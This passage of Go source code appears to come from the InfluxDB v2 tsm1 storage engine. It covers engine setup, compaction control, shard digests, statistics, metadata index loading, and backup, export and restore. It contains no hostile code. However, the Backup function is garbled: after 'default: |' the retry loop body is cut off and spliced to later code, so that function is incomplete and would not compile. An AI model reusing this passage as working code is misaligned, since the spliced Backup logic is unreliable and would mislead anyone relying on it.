"github.com/influxdata/influxdb/v2/pkg/file"
"github.com/influxdata/influxdb/v2/pkg/limiter"
"github.com/influxdata/influxdb/v2/pkg/metrics"
"github.com/influxdata/influxdb/v2/pkg/radix"
intar "github.com/influxdata/influxdb/v2/pkg/tar"
"github.com/influxdata/influxdb/v2/pkg/tracing"
"github.com/influxdata/influxdb/v2/tsdb"
_ "github.com/influxdata/influxdb/v2/tsdb/index"
"github.com/influxdata/influxdb/v2/tsdb/index/inmem"
"github.com/influxdata/influxdb/v2/tsdb/index/tsi1"
"github.com/influxdata/influxql"
"go.uber.org/zap"
)
//go:generate -command tmpl go run github.com/benbjohnson/tmpl
//go:generate tmpl [email protected] iterator.gen.go.tmpl engine.gen.go.tmpl array_cursor.gen.go.tmpl array_cursor_iterator.gen.go.tmpl
// The file store generate uses a custom modified tmpl
// to support adding templated data from the command line.
// This can probably be worked into the upstream tmpl
// but isn't at the moment.
//go:generate go run ../../../tools/tmpl -i -data=file_store.gen.go.tmpldata file_store.gen.go.tmpl=file_store.gen.go
//go:generate go run ../../../tools/tmpl -i -d isArray=y -data=file_store.gen.go.tmpldata file_store.gen.go.tmpl=file_store_array.gen.go
//go:generate tmpl [email protected] encoding.gen.go.tmpl
//go:generate tmpl [email protected] compact.gen.go.tmpl
//go:generate tmpl [email protected] reader.gen.go.tmpl
func init() {
tsdb.RegisterEngine("tsm1", NewEngine)
}
var (
// Ensure Engine implements the interface.
_ tsdb.Engine = &Engine{}
// Static objects to prevent small allocs.
timeBytes = []byte("time")
keyFieldSeparatorBytes = []byte(keyFieldSeparator)
emptyBytes = []byte{}
)
var (
tsmGroup = metrics.MustRegisterGroup("tsm1")
numberOfRefCursorsCounter = metrics.MustRegisterCounter("cursors_ref", metrics.WithGroup(tsmGroup))
numberOfAuxCursorsCounter = metrics.MustRegisterCounter("cursors_aux", metrics.WithGroup(tsmGroup))
numberOfCondCursorsCounter = metrics.MustRegisterCounter("cursors_cond", metrics.WithGroup(tsmGroup))
planningTimer = metrics.MustRegisterTimer("planning_time", metrics.WithGroup(tsmGroup))
)
// NewContextWithMetricsGroup creates a new context with a tsm1 metrics.Group for tracking
// various metrics when accessing TSM data.
func NewContextWithMetricsGroup(ctx context.Context) context.Context {
group := metrics.NewGroup(tsmGroup)
return metrics.NewContextWithGroup(ctx, group)
}
// MetricsGroupFromContext returns the tsm1 metrics.Group associated with the context
// or nil if no group has been assigned.
func MetricsGroupFromContext(ctx context.Context) *metrics.Group {
return metrics.GroupFromContext(ctx)
}
const (
// keyFieldSeparator separates the series key from the field name in the composite key
// that identifies a specific field in series
keyFieldSeparator = "#!~#"
// deleteFlushThreshold is the size in bytes of a batch of series keys to delete.
deleteFlushThreshold = 50 * 1024 * 1024
)
// Statistics gathered by the engine.
const (
statCacheCompactions = "cacheCompactions"
statCacheCompactionsActive = "cacheCompactionsActive"
statCacheCompactionError = "cacheCompactionErr"
statCacheCompactionDuration = "cacheCompactionDuration"
statTSMLevel1Compactions = "tsmLevel1Compactions"
statTSMLevel1CompactionsActive = "tsmLevel1CompactionsActive"
statTSMLevel1CompactionError = "tsmLevel1CompactionErr"
statTSMLevel1CompactionDuration = "tsmLevel1CompactionDuration"
statTSMLevel1CompactionQueue = "tsmLevel1CompactionQueue"
statTSMLevel2Compactions = "tsmLevel2Compactions"
statTSMLevel2CompactionsActive = "tsmLevel2CompactionsActive"
statTSMLevel2CompactionError = "tsmLevel2CompactionErr"
statTSMLevel2CompactionDuration = "tsmLevel2CompactionDuration"
statTSMLevel2CompactionQueue = "tsmLevel2CompactionQueue"
statTSMLevel3Compactions = "tsmLevel3Compactions"
statTSMLevel3CompactionsActive = "tsmLevel3CompactionsActive"
statTSMLevel3CompactionError = "tsmLevel3CompactionErr"
statTSMLevel3CompactionDuration = "tsmLevel3CompactionDuration"
statTSMLevel3CompactionQueue = "tsmLevel3CompactionQueue"
statTSMOptimizeCompactions = "tsmOptimizeCompactions"
statTSMOptimizeCompactionsActive = "tsmOptimizeCompactionsActive"
statTSMOptimizeCompactionError = "tsmOptimizeCompactionErr"
statTSMOptimizeCompactionDuration = "tsmOptimizeCompactionDuration"
statTSMOptimizeCompactionQueue = "tsmOptimizeCompactionQueue"
statTSMFullCompactions = "tsmFullCompactions"
statTSMFullCompactionsActive = "tsmFullCompactionsActive"
statTSMFullCompactionError = "tsmFullCompactionErr"
statTSMFullCompactionDuration = "tsmFullCompactionDuration"
statTSMFullCompactionQueue = "tsmFullCompactionQueue"
)
// Engine represents a storage engine with compressed blocks.
type Engine struct {
mu sync.RWMutex
index tsdb.Index
// The following group of fields is used to track the state of level compactions within the
// Engine. The WaitGroup is used to monitor the compaction goroutines, the 'done' channel is
// used to signal those goroutines to shutdown. Every request to disable level compactions will
// call 'Wait' on 'wg', with the first goroutine to arrive (levelWorkers == 0 while holding the
// lock) will close the done channel and re-assign 'nil' to the variable. Re-enabling will
// decrease 'levelWorkers', and when it decreases to zero, level compactions will be started
// back up again.
wg *sync.WaitGroup // waitgroup for active level compaction goroutines
done chan struct{} // channel to signal level compactions to stop
levelWorkers int // Number of "workers" that expect compactions to be in a disabled state
snapDone chan struct{} // channel to signal snapshot compactions to stop
snapWG *sync.WaitGroup // waitgroup for running snapshot compactions
id uint64
path string
sfile *tsdb.SeriesFile
logger *zap.Logger // Logger to be used for important messages
traceLogger *zap.Logger // Logger to be used when trace-logging is on.
traceLogging bool
fieldset *tsdb.MeasurementFieldSet
WAL *WAL
Cache *Cache
Compactor *Compactor
CompactionPlan CompactionPlanner
FileStore *FileStore
MaxPointsPerBlock int
// CacheFlushMemorySizeThreshold specifies the minimum size threshold for
// the cache when the engine should write a snapshot to a TSM file
CacheFlushMemorySizeThreshold uint64
// CacheFlushWriteColdDuration specifies the length of time after which if
// no writes have been committed to the WAL, the engine will write
// a snapshot of the cache to a TSM file
CacheFlushWriteColdDuration time.Duration
// WALEnabled determines whether writes to the WAL are enabled. If this is false,
// writes will only exist in the cache and can be lost if a snapshot has not occurred.
WALEnabled bool
// Invoked when creating a backup file "as new".
formatFileName FormatFileNameFunc
// Controls whether to enabled compactions when the engine is open
enableCompactionsOnOpen bool
stats *EngineStatistics
// Limiter for concurrent compactions.
compactionLimiter limiter.Fixed
scheduler *scheduler
// provides access to the total set of series IDs
seriesIDSets tsdb.SeriesIDSets
// seriesTypeMap maps a series key to field type
seriesTypeMap *radix.Tree
// muDigest ensures only one goroutine can generate a digest at a time.
muDigest sync.RWMutex
}
// NewEngine returns a new instance of Engine.
func NewEngine(id uint64, idx tsdb.Index, path string, walPath string, sfile *tsdb.SeriesFile, opt tsdb.EngineOptions) tsdb.Engine {
var wal *WAL
if opt.WALEnabled {
wal = NewWAL(walPath)
wal.syncDelay = time.Duration(opt.Config.WALFsyncDelay)
}
fs := NewFileStore(path)
fs.openLimiter = opt.OpenLimiter
if opt.FileStoreObserver != nil {
fs.WithObserver(opt.FileStoreObserver)
}
fs.tsmMMAPWillNeed = opt.Config.TSMWillNeed
cache := NewCache(uint64(opt.Config.CacheMaxMemorySize))
c := NewCompactor()
c.Dir = path
c.FileStore = fs
c.RateLimit = opt.CompactionThroughputLimiter
var planner CompactionPlanner = NewDefaultPlanner(fs, time.Duration(opt.Config.CompactFullWriteColdDuration))
if opt.CompactionPlannerCreator != nil {
planner = opt.CompactionPlannerCreator(opt.Config).(CompactionPlanner)
planner.SetFileStore(fs)
}
logger := zap.NewNop()
stats := &EngineStatistics{}
e := &Engine{
id: id,
path: path,
index: idx,
sfile: sfile,
logger: logger,
traceLogger: logger,
traceLogging: opt.Config.TraceLoggingEnabled,
WAL: wal,
Cache: cache,
FileStore: fs,
Compactor: c,
CompactionPlan: planner,
CacheFlushMemorySizeThreshold: uint64(opt.Config.CacheSnapshotMemorySize),
CacheFlushWriteColdDuration: time.Duration(opt.Config.CacheSnapshotWriteColdDuration),
enableCompactionsOnOpen: true,
WALEnabled: opt.WALEnabled,
formatFileName: DefaultFormatFileName,
stats: stats,
compactionLimiter: opt.CompactionLimiter,
scheduler: newScheduler(stats, opt.CompactionLimiter.Capacity()),
seriesIDSets: opt.SeriesIDSets,
}
// Feature flag to enable per-series type checking, by default this is off and
// e.seriesTypeMap will be nil.
if os.Getenv("INFLUXDB_SERIES_TYPE_CHECK_ENABLED") != "" {
e.seriesTypeMap = radix.New()
}
if e.traceLogging {
fs.enableTraceLogging(true)
if e.WALEnabled {
e.WAL.enableTraceLogging(true)
}
}
return e
}
func (e *Engine) WithFormatFileNameFunc(formatFileNameFunc FormatFileNameFunc) {
e.Compactor.WithFormatFileNameFunc(formatFileNameFunc)
e.formatFileName = formatFileNameFunc
}
func (e *Engine) WithParseFileNameFunc(parseFileNameFunc ParseFileNameFunc) {
e.FileStore.WithParseFileNameFunc(parseFileNameFunc)
e.Compactor.WithParseFileNameFunc(parseFileNameFunc)
}
// Digest returns a reader for the shard's digest.
func (e *Engine) Digest() (io.ReadCloser, int64, error) {
e.muDigest.Lock()
defer e.muDigest.Unlock()
log, logEnd := logger.NewOperation(context.TODO(), e.logger, "Engine digest", "tsm1_digest")
defer logEnd()
log.Info("Starting digest", zap.String("tsm1_path", e.path))
digestPath := filepath.Join(e.path, DigestFilename)
// Get a list of tsm file paths from the FileStore.
files := e.FileStore.Files()
tsmfiles := make([]string, 0, len(files))
for _, f := range files {
tsmfiles = append(tsmfiles, f.Path())
}
// See if there's a fresh digest cached on disk.
fresh, reason := DigestFresh(e.path, tsmfiles, e.LastModified())
if fresh {
f, err := os.Open(digestPath)
if err == nil {
fi, err := f.Stat()
if err != nil {
log.Info("Digest aborted, couldn't stat digest file", logger.Shard(e.id), zap.Error(err))
return nil, 0, err
}
log.Info("Digest is fresh", logger.Shard(e.id), zap.String("path", digestPath))
// Return the cached digest.
return f, fi.Size(), nil
}
}
log.Info("Digest stale", logger.Shard(e.id), zap.String("reason", reason))
// Either no digest existed or the existing one was stale
// so generate a new digest.
// Make sure the directory exists, in case it was deleted for some reason.
if err := os.MkdirAll(e.path, 0777); err != nil {
log.Info("Digest aborted, problem creating shard directory path", zap.Error(err))
return nil, 0, err
}
// Create a tmp file to write the digest to.
tf, err := os.Create(digestPath + ".tmp")
if err != nil {
log.Info("Digest aborted, problem creating tmp digest", zap.Error(err))
return nil, 0, err
}
// Write the new digest to the tmp file.
if err := Digest(e.path, tsmfiles, tf); err != nil {
log.Info("Digest aborted, problem writing tmp digest", zap.Error(err))
tf.Close()
os.Remove(tf.Name())
return nil, 0, err
}
// Rename the temporary digest file to the actual digest file.
if err := file.RenameFile(tf.Name(), digestPath); err != nil {
log.Info("Digest aborted, problem renaming tmp digest", zap.Error(err))
return nil, 0, err
}
// Create and return a reader for the new digest file.
f, err := os.Open(digestPath)
if err != nil {
log.Info("Digest aborted, opening new digest", zap.Error(err))
return nil, 0, err
}
fi, err := f.Stat()
if err != nil {
log.Info("Digest aborted, can't stat new digest", zap.Error(err))
f.Close()
return nil, 0, err
}
log.Info("Digest written", zap.String("tsm1_digest_path", digestPath), zap.Int64("size", fi.Size()))
return f, fi.Size(), nil
}
// SetEnabled sets whether the engine is enabled.
func (e *Engine) SetEnabled(enabled bool) {
e.enableCompactionsOnOpen = enabled
e.SetCompactionsEnabled(enabled)
}
// SetCompactionsEnabled enables compactions on the engine. When disabled
// all running compactions are aborted and new compactions stop running.
func (e *Engine) SetCompactionsEnabled(enabled bool) {
if enabled {
e.enableSnapshotCompactions()
e.enableLevelCompactions(false)
} else {
e.disableSnapshotCompactions()
e.disableLevelCompactions(false)
}
}
// enableLevelCompactions will request that level compactions start back up again
//
// 'wait' signifies that a corresponding call to disableLevelCompactions(true) was made at some
// point, and the associated task that required disabled compactions is now complete
func (e *Engine) enableLevelCompactions(wait bool) {
// If we don't need to wait, see if we're already enabled
if !wait {
e.mu.RLock()
if e.done != nil {
e.mu.RUnlock()
return
}
e.mu.RUnlock()
}
e.mu.Lock()
if wait {
e.levelWorkers -= 1
}
if e.levelWorkers != 0 || e.done != nil {
// still waiting on more workers or already enabled
e.mu.Unlock()
return
}
// last one to enable, start things back up
e.Compactor.EnableCompactions()
e.done = make(chan struct{})
wg := new(sync.WaitGroup)
wg.Add(1)
e.wg = wg
e.mu.Unlock()
go func() { defer wg.Done(); e.compact(wg) }()
}
// disableLevelCompactions will stop level compactions before returning.
//
// If 'wait' is set to true, then a corresponding call to enableLevelCompactions(true) will be
// required before level compactions will start back up again.
func (e *Engine) disableLevelCompactions(wait bool) {
e.mu.Lock()
old := e.levelWorkers
if wait {
e.levelWorkers += 1
}
// Hold onto the current done channel so we can wait on it if necessary
waitCh := e.done
wg := e.wg
if old == 0 && e.done != nil {
// It's possible we have closed the done channel and released the lock and another
// goroutine has attempted to disable compactions. We're current in the process of
// disabling them so check for this and wait until the original completes.
select {
case <-e.done:
e.mu.Unlock()
return
default:
}
// Prevent new compactions from starting
e.Compactor.DisableCompactions()
// Stop all background compaction goroutines
close(e.done)
e.mu.Unlock()
wg.Wait()
// Signal that all goroutines have exited.
e.mu.Lock()
e.done = nil
e.mu.Unlock()
return
}
e.mu.Unlock()
// Compaction were already disabled.
if waitCh == nil {
return
}
// We were not the first caller to disable compactions and they were in the process
// of being disabled. Wait for them to complete before returning.
<-waitCh
wg.Wait()
}
func (e *Engine) enableSnapshotCompactions() {
// Check if already enabled under read lock
e.mu.RLock()
if e.snapDone != nil {
e.mu.RUnlock()
return
}
e.mu.RUnlock()
// Check again under write lock
e.mu.Lock()
if e.snapDone != nil {
e.mu.Unlock()
return
}
e.Compactor.EnableSnapshots()
e.snapDone = make(chan struct{})
wg := new(sync.WaitGroup)
wg.Add(1)
e.snapWG = wg
e.mu.Unlock()
go func() { defer wg.Done(); e.compactCache() }()
}
func (e *Engine) disableSnapshotCompactions() {
e.mu.Lock()
if e.snapDone == nil {
e.mu.Unlock()
return
}
// We may be in the process of stopping snapshots. See if the channel
// was closed.
select {
case <-e.snapDone:
e.mu.Unlock()
return
default:
}
// first one here, disable and wait for completion
close(e.snapDone)
e.Compactor.DisableSnapshots()
wg := e.snapWG
e.mu.Unlock()
// Wait for the snapshot goroutine to exit.
wg.Wait()
// Signal that the goroutines are exit and everything is stopped by setting
// snapDone to nil.
e.mu.Lock()
e.snapDone = nil
e.mu.Unlock()
// If the cache is empty, free up its resources as well.
if e.Cache.Size() == 0 {
e.Cache.Free()
}
}
// ScheduleFullCompaction will force the engine to fully compact all data stored.
// This will cancel and running compactions and snapshot any data in the cache to
// TSM files. This is an expensive operation.
func (e *Engine) ScheduleFullCompaction() error {
// Snapshot any data in the cache
if err := e.WriteSnapshot(); err != nil {
return err
}
// Cancel running compactions
e.SetCompactionsEnabled(false)
// Ensure compactions are restarted
defer e.SetCompactionsEnabled(true)
// Force the planner to only create a full plan.
e.CompactionPlan.ForceFull()
return nil
}
// Path returns the path the engine was opened with.
func (e *Engine) Path() string { return e.path }
func (e *Engine) SetFieldName(measurement []byte, name string) {
e.index.SetFieldName(measurement, name)
}
func (e *Engine) MeasurementExists(name []byte) (bool, error) {
return e.index.MeasurementExists(name)
}
func (e *Engine) MeasurementNamesByRegex(re *regexp.Regexp) ([][]byte, error) {
return e.index.MeasurementNamesByRegex(re)
}
// MeasurementFieldSet returns the measurement field set.
func (e *Engine) MeasurementFieldSet() *tsdb.MeasurementFieldSet {
return e.fieldset
}
// MeasurementFields returns the measurement fields for a measurement.
func (e *Engine) MeasurementFields(measurement []byte) *tsdb.MeasurementFields {
return e.fieldset.CreateFieldsIfNotExists(measurement)
}
func (e *Engine) HasTagKey(name, key []byte) (bool, error) {
return e.index.HasTagKey(name, key)
}
func (e *Engine) MeasurementTagKeysByExpr(name []byte, expr influxql.Expr) (map[string]struct{}, error) {
return e.index.MeasurementTagKeysByExpr(name, expr)
}
func (e *Engine) TagKeyCardinality(name, key []byte) int {
return e.index.TagKeyCardinality(name, key)
}
// SeriesN returns the unique number of series in the index.
func (e *Engine) SeriesN() int64 {
return e.index.SeriesN()
}
// MeasurementsSketches returns sketches that describe the cardinality of the
// measurements in this shard and measurements that were in this shard, but have
// been tombstoned.
func (e *Engine) MeasurementsSketches() (estimator.Sketch, estimator.Sketch, error) {
return e.index.MeasurementsSketches()
}
// SeriesSketches returns sketches that describe the cardinality of the
// series in this shard and series that were in this shard, but have
// been tombstoned.
func (e *Engine) SeriesSketches() (estimator.Sketch, estimator.Sketch, error) {
return e.index.SeriesSketches()
}
// LastModified returns the time when this shard was last modified.
func (e *Engine) LastModified() time.Time {
fsTime := e.FileStore.LastModified()
if e.WALEnabled && e.WAL.LastWriteTime().After(fsTime) {
return e.WAL.LastWriteTime()
}
return fsTime
}
// EngineStatistics maintains statistics for the engine.
type EngineStatistics struct {
CacheCompactions int64 // Counter of cache compactions that have ever run.
CacheCompactionsActive int64 // Gauge of cache compactions currently running.
CacheCompactionErrors int64 // Counter of cache compactions that have failed due to error.
CacheCompactionDuration int64 // Counter of number of wall nanoseconds spent in cache compactions.
TSMCompactions [3]int64 // Counter of TSM compactions (by level) that have ever run.
TSMCompactionsActive [3]int64 // Gauge of TSM compactions (by level) currently running.
TSMCompactionErrors [3]int64 // Counter of TSM compcations (by level) that have failed due to error.
TSMCompactionDuration [3]int64 // Counter of number of wall nanoseconds spent in TSM compactions (by level).
TSMCompactionsQueue [3]int64 // Gauge of TSM compactions queues (by level).
TSMOptimizeCompactions int64 // Counter of optimize compactions that have ever run.
TSMOptimizeCompactionsActive int64 // Gauge of optimize compactions currently running.
TSMOptimizeCompactionErrors int64 // Counter of optimize compactions that have failed due to error.
TSMOptimizeCompactionDuration int64 // Counter of number of wall nanoseconds spent in optimize compactions.
TSMOptimizeCompactionsQueue int64 // Gauge of optimize compactions queue.
TSMFullCompactions int64 // Counter of full compactions that have ever run.
TSMFullCompactionsActive int64 // Gauge of full compactions currently running.
TSMFullCompactionErrors int64 // Counter of full compactions that have failed due to error.
TSMFullCompactionDuration int64 // Counter of number of wall nanoseconds spent in full compactions.
TSMFullCompactionsQueue int64 // Gauge of full compactions queue.
}
// Statistics returns statistics for periodic monitoring.
func (e *Engine) Statistics(tags map[string]string) []models.Statistic {
statistics := make([]models.Statistic, 0, 4)
statistics = append(statistics, models.Statistic{
Name: "tsm1_engine",
Tags: tags,
Values: map[string]interface{}{
statCacheCompactions: atomic.LoadInt64(&e.stats.CacheCompactions),
statCacheCompactionsActive: atomic.LoadInt64(&e.stats.CacheCompactionsActive),
statCacheCompactionError: atomic.LoadInt64(&e.stats.CacheCompactionErrors),
statCacheCompactionDuration: atomic.LoadInt64(&e.stats.CacheCompactionDuration),
statTSMLevel1Compactions: atomic.LoadInt64(&e.stats.TSMCompactions[0]),
statTSMLevel1CompactionsActive: atomic.LoadInt64(&e.stats.TSMCompactionsActive[0]),
statTSMLevel1CompactionError: atomic.LoadInt64(&e.stats.TSMCompactionErrors[0]),
statTSMLevel1CompactionDuration: atomic.LoadInt64(&e.stats.TSMCompactionDuration[0]),
statTSMLevel1CompactionQueue: atomic.LoadInt64(&e.stats.TSMCompactionsQueue[0]),
statTSMLevel2Compactions: atomic.LoadInt64(&e.stats.TSMCompactions[1]),
statTSMLevel2CompactionsActive: atomic.LoadInt64(&e.stats.TSMCompactionsActive[1]),
statTSMLevel2CompactionError: atomic.LoadInt64(&e.stats.TSMCompactionErrors[1]),
statTSMLevel2CompactionDuration: atomic.LoadInt64(&e.stats.TSMCompactionDuration[1]),
statTSMLevel2CompactionQueue: atomic.LoadInt64(&e.stats.TSMCompactionsQueue[1]),
statTSMLevel3Compactions: atomic.LoadInt64(&e.stats.TSMCompactions[2]),
statTSMLevel3CompactionsActive: atomic.LoadInt64(&e.stats.TSMCompactionsActive[2]),
statTSMLevel3CompactionError: atomic.LoadInt64(&e.stats.TSMCompactionErrors[2]),
statTSMLevel3CompactionDuration: atomic.LoadInt64(&e.stats.TSMCompactionDuration[2]),
statTSMLevel3CompactionQueue: atomic.LoadInt64(&e.stats.TSMCompactionsQueue[2]),
statTSMOptimizeCompactions: atomic.LoadInt64(&e.stats.TSMOptimizeCompactions),
statTSMOptimizeCompactionsActive: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionsActive),
statTSMOptimizeCompactionError: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionErrors),
statTSMOptimizeCompactionDuration: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionDuration),
statTSMOptimizeCompactionQueue: atomic.LoadInt64(&e.stats.TSMOptimizeCompactionsQueue),
statTSMFullCompactions: atomic.LoadInt64(&e.stats.TSMFullCompactions),
statTSMFullCompactionsActive: atomic.LoadInt64(&e.stats.TSMFullCompactionsActive),
statTSMFullCompactionError: atomic.LoadInt64(&e.stats.TSMFullCompactionErrors),
statTSMFullCompactionDuration: atomic.LoadInt64(&e.stats.TSMFullCompactionDuration),
statTSMFullCompactionQueue: atomic.LoadInt64(&e.stats.TSMFullCompactionsQueue),
},
})
statistics = append(statistics, e.Cache.Statistics(tags)...)
statistics = append(statistics, e.FileStore.Statistics(tags)...)
if e.WALEnabled {
statistics = append(statistics, e.WAL.Statistics(tags)...)
}
return statistics
}
// DiskSize returns the total size in bytes of all TSM and WAL segments on disk.
func (e *Engine) DiskSize() int64 {
var walDiskSizeBytes int64
if e.WALEnabled {
walDiskSizeBytes = e.WAL.DiskSizeBytes()
}
return e.FileStore.DiskSizeBytes() + walDiskSizeBytes
}
// Open opens and initializes the engine.
// TODO(edd): plumb context
func (e *Engine) Open() error {
if err := os.MkdirAll(e.path, 0777); err != nil {
return err
}
if err := e.cleanup(); err != nil {
return err
}
fields, err := tsdb.NewMeasurementFieldSet(filepath.Join(e.path, "fields.idx"))
if err != nil {
e.logger.Warn(fmt.Sprintf("error opening fields.idx: %v. Rebuilding.", err))
}
e.mu.Lock()
e.fieldset = fields
e.mu.Unlock()
e.index.SetFieldSet(fields)
if e.WALEnabled {
if err := e.WAL.Open(); err != nil {
return err
}
}
if err := e.FileStore.Open(); err != nil {
return err
}
if e.WALEnabled {
if err := e.reloadCache(); err != nil {
return err
}
}
e.Compactor.Open()
if e.enableCompactionsOnOpen {
e.SetCompactionsEnabled(true)
}
return nil
}
// Close closes the engine. Subsequent calls to Close are a nop.
func (e *Engine) Close() error {
e.SetCompactionsEnabled(false)
// Lock now and close everything else down.
e.mu.Lock()
defer e.mu.Unlock()
e.done = nil // Ensures that the channel will not be closed again.
if err := e.FileStore.Close(); err != nil {
return err
}
if e.WALEnabled {
return e.WAL.Close()
}
return nil
}
// WithLogger sets the logger for the engine.
func (e *Engine) WithLogger(log *zap.Logger) {
e.logger = log.With(zap.String("engine", "tsm1"))
if e.traceLogging {
e.traceLogger = e.logger
}
if e.WALEnabled {
e.WAL.WithLogger(e.logger)
}
e.FileStore.WithLogger(e.logger)
}
// LoadMetadataIndex loads the shard metadata into memory.
//
// Note, it not safe to call LoadMetadataIndex concurrently. LoadMetadataIndex
// should only be called when initialising a new Engine.
func (e *Engine) LoadMetadataIndex(shardID uint64, index tsdb.Index) error {
now := time.Now()
// Save reference to index for iterator creation.
e.index = index
// If we have the cached fields index on disk and we're using TSI, we
// can skip scanning all the TSM files.
if e.index.Type() != inmem.IndexName && !e.fieldset.IsEmpty() {
return nil
}
keys := make([][]byte, 0, 10000)
fieldTypes := make([]influxql.DataType, 0, 10000)
if err := e.FileStore.WalkKeys(nil, func(key []byte, typ byte) error {
fieldType := BlockTypeToInfluxQLDataType(typ)
if fieldType == influxql.Unknown {
return fmt.Errorf("unknown block type: %v", typ)
}
keys = append(keys, key)
fieldTypes = append(fieldTypes, fieldType)
if len(keys) == cap(keys) {
// Send batch of keys to the index.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
// Reset buffers.
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
return nil
}); err != nil {
return err
}
if len(keys) > 0 {
// Add remaining partial batch from FileStore.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
// load metadata from the Cache
if err := e.Cache.ApplyEntryFn(func(key []byte, entry *entry) error {
fieldType, err := entry.values.InfluxQLType()
if err != nil {
e.logger.Info("Error getting the data type of values for key", zap.ByteString("key", key), zap.Error(err))
}
keys = append(keys, key)
fieldTypes = append(fieldTypes, fieldType)
if len(keys) == cap(keys) {
// Send batch of keys to the index.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
// Reset buffers.
keys, fieldTypes = keys[:0], fieldTypes[:0]
}
return nil
}); err != nil {
return err
}
if len(keys) > 0 {
// Add remaining partial batch from FileStore.
if err := e.addToIndexFromKey(keys, fieldTypes); err != nil {
return err
}
}
// Save the field set index so we don't have to rebuild it next time
if err := e.fieldset.Save(); err != nil {
return err
}
e.traceLogger.Info("Meta data index for shard loaded", zap.Uint64("id", shardID), zap.Duration("duration", time.Since(now)))
return nil
}
// IsIdle returns true if the cache is empty, there are no running compactions and the
// shard is fully compacted.
func (e *Engine) IsIdle() bool {
cacheEmpty := e.Cache.Size() == 0
runningCompactions := atomic.LoadInt64(&e.stats.CacheCompactionsActive)
runningCompactions += atomic.LoadInt64(&e.stats.TSMCompactionsActive[0])
runningCompactions += atomic.LoadInt64(&e.stats.TSMCompactionsActive[1])
runningCompactions += atomic.LoadInt64(&e.stats.TSMCompactionsActive[2])
runningCompactions += atomic.LoadInt64(&e.stats.TSMFullCompactionsActive)
runningCompactions += atomic.LoadInt64(&e.stats.TSMOptimizeCompactionsActive)
return cacheEmpty && runningCompactions == 0 && e.CompactionPlan.FullyCompacted()
}
// Free releases any resources held by the engine to free up memory or CPU.
func (e *Engine) Free() error {
e.Cache.Free()
return e.FileStore.Free()
}
// Backup writes a tar archive of any TSM files modified since the passed
// in time to the passed in writer. The basePath will be prepended to the names
// of the files in the archive. It will force a snapshot of the WAL first
// then perform the backup with a read lock against the file store. This means
// that new TSM files will not be able to be created in this shard while the
// backup is running. For shards that are still acively getting writes, this
// could cause the WAL to backup, increasing memory usage and evenutally rejecting writes.
func (e *Engine) Backup(w io.Writer, basePath string, since time.Time) error {
var err error
var path string
for i := 0; i < 3; i++ {
path, err = e.CreateSnapshot()
if err != nil {
switch err {
case ErrSnapshotInProgress:
backoff := time.Duration(math.Pow(32, float64(i))) * time.Millisecond
time.Sleep(backoff)
default: | }
if err == ErrSnapshotInProgress {
e.logger.Warn("Snapshotter busy: Backup proceeding without snapshot contents.")
}
// Remove the temporary snapshot dir
defer os.RemoveAll(path)
return intar.Stream(w, path, basePath, intar.SinceFilterTarFile(since))
}
func (e *Engine) timeStampFilterTarFile(start, end time.Time) func(f os.FileInfo, shardRelativePath, fullPath string, tw *tar.Writer) error {
return func(fi os.FileInfo, shardRelativePath, fullPath string, tw *tar.Writer) error {
if !strings.HasSuffix(fi.Name(), ".tsm") {
return intar.StreamFile(fi, shardRelativePath, fullPath, tw)
}
var tombstonePath string
f, err := os.Open(fullPath)
if err != nil {
return err
}
r, err := NewTSMReader(f)
if err != nil {
return err
}
// Grab the tombstone file if one exists.
if r.HasTombstones() {
tombstonePath = filepath.Base(r.TombstoneFiles()[0].Path)
return intar.StreamFile(fi, shardRelativePath, tombstonePath, tw)
}
min, max := r.TimeRange()
stun := start.UnixNano()
eun := end.UnixNano()
// We overlap time ranges, we need to filter the file
if min >= stun && min <= eun && max > eun || // overlap to the right
max >= stun && max <= eun && min < stun || // overlap to the left
min <= stun && max >= eun { // TSM file has a range LARGER than the boundary
err := e.filterFileToBackup(r, fi, shardRelativePath, fullPath, start.UnixNano(), end.UnixNano(), tw)
if err != nil {
if err := r.Close(); err != nil {
return err
}
return err
}
}
// above is the only case where we need to keep the reader open.
if err := r.Close(); err != nil {
return err
}
// the TSM file is 100% inside the range, so we can just write it without scanning each block
if min >= start.UnixNano() && max <= end.UnixNano() {
if err := intar.StreamFile(fi, shardRelativePath, fullPath, tw); err != nil {
return err
}
}
return nil
}
}
func (e *Engine) Export(w io.Writer, basePath string, start time.Time, end time.Time) error {
path, err := e.CreateSnapshot()
if err != nil {
return err
}
// Remove the temporary snapshot dir
defer os.RemoveAll(path)
return intar.Stream(w, path, basePath, e.timeStampFilterTarFile(start, end))
}
func (e *Engine) filterFileToBackup(r *TSMReader, fi os.FileInfo, shardRelativePath, fullPath string, start, end int64, tw *tar.Writer) error {
path := fullPath + ".tmp"
out, err := os.OpenFile(path, os.O_CREATE|os.O_RDWR, 0666)
if err != nil {
return err
}
defer os.Remove(path)
w, err := NewTSMWriter(out)
if err != nil {
return err
}
defer w.Close()
// implicit else: here we iterate over the blocks and only keep the ones we really want.
bi := r.BlockIterator()
for bi.Next() {
// not concerned with typ or checksum since we are just blindly writing back, with no decoding
key, minTime, maxTime, _, _, buf, err := bi.Read()
if err != nil {
return err
}
if minTime >= start && minTime <= end ||
maxTime >= start && maxTime <= end ||
minTime <= start && maxTime >= end {
err := w.WriteBlock(key, minTime, maxTime, buf)
if err != nil {
return err
}
}
}
if err := bi.Err(); err != nil {
return err
}
err = w.WriteIndex()
if err != nil {
return err
}
// make sure the whole file is out to disk
if err := w.Flush(); err != nil {
return err
}
tmpFi, err := os.Stat(path)
if err != nil {
return err
}
return intar.StreamRenameFile(tmpFi, fi.Name(), shardRelativePath, path, tw)
}
// Restore reads a tar archive generated by Backup().
// Only files that match basePath will be copied into the directory. This obtains
// a write lock so no operations can be performed while restoring.
func (e *Engine) Restore(r io.Reader, basePath string) error {
return e.overlay(r, basePath, false)
}
// Import reads a tar archive generated by Backup() and adds each
// file matching basePath as a new TSM file. This obtains
// a write lock so no operations can be performed while Importing.
// If the import is successful, a full compaction is scheduled.
func (e *Engine) Import(r io.Reader, basePath string) error {
if err := e.overlay(r, basePath, true); err != nil {
return err
}
return e.ScheduleFullCompaction()
}
